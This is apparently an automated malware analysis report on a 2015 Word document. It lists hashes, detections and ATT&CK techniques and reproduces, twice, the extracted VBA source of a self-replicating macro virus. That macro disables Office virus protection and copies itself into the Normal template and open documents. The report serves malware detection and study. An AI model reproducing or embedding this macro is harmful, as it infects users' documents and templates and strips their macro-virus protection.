Office (OLE) malware analysis — malicious · a53e2d236a40bde4

MALICIOUS

Office (OLE)

42.5 KB Created: 2015-07-07 07:54:00 Authoring application: Microsoft Office Word First seen: 2015-09-17

MD5: 2c11056b8a89867d23b5bdbc31d2ff30 SHA-1: b950816ab3649713fbf6bbdb8b6b0ec725c0c028 SHA-256: a53e2d236a40bde415267bcef32dfee68d08e3749b31a2b6c14371ed304b01f5

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for malicious documents. The script explicitly disables virus protection and attempts to replicate its code to the Normal template and the active document. This self-replication behavior, along with disabling macro security, strongly suggests an attempt at persistence and evasion. While no external network activity or specific exploit is evident, the macro's actions are indicative of malware designed to maintain a foothold.

Heuristics 4

ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1441 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1441 bytes
SHA-256: `9299e72afe1cfe327ca211179d4256d1d66c64ceec6e639fbb1886a44a31df44`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Close()Open()Close()Open() Private Sub Document_Open() On Error Resume Next Options.VirusProtection = False EnableCancelKey = wdCancelDisabled Set maci = MacroContainer.VBProject.VBComponents.Item(1) Set macic = maci.codemodule ns$ = Left(macic.Lines(1, 1), 21) Set inf = NormalTemplate: nsi$ = ns$ + "Close()" If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()" Set infc = inf.VBProject.VBComponents Set infi = infc.Item(1) Set infic = infi.codemodule infi.Name = "ThisDocument" For mx = 2 To infc.Count infc.Remove infc.Item(2) Next mx If infic.countlines <> macic.countoflines Then infic.deletelines 1, infic.countoflines For coco = 1 To macic.countoflines infic.insertlines coco, macic.Lines(coco, 1) Next coco infic.replaceline 1, nsi$ End If If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName EnableCancelKey = wdCancelDisabled End Sub 'ThisDocument v 1.0 1999

SHA-256: 9299e72afe1cfe327ca211179d4256d1d66c64ceec6e639fbb1886a44a31df44

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Close()Open()Close()Open()
Private Sub Document_Open()
    On Error Resume Next
    Options.VirusProtection = False
    EnableCancelKey = wdCancelDisabled
    Set maci = MacroContainer.VBProject.VBComponents.Item(1)
    Set macic = maci.codemodule
    ns$ = Left(macic.Lines(1, 1), 21)
    Set inf = NormalTemplate: nsi$ = ns$ + "Close()"
        If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()"
    Set infc = inf.VBProject.VBComponents
    Set infi = infc.Item(1)
    Set infic = infi.codemodule
    infi.Name = "ThisDocument"
    For mx = 2 To infc.Count
        infc.Remove infc.Item(2)
    Next mx
        If infic.countlines <> macic.countoflines Then
            infic.deletelines 1, infic.countoflines
            For coco = 1 To macic.countoflines
                infic.insertlines coco, macic.Lines(coco, 1)
            Next coco
            infic.replaceline 1, nsi$
        End If
    If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    EnableCancelKey = wdCancelDisabled
End Sub
'ThisDocument v 1.0 1999

Open this report in the interactive analyzer, or submit your own file for analysis.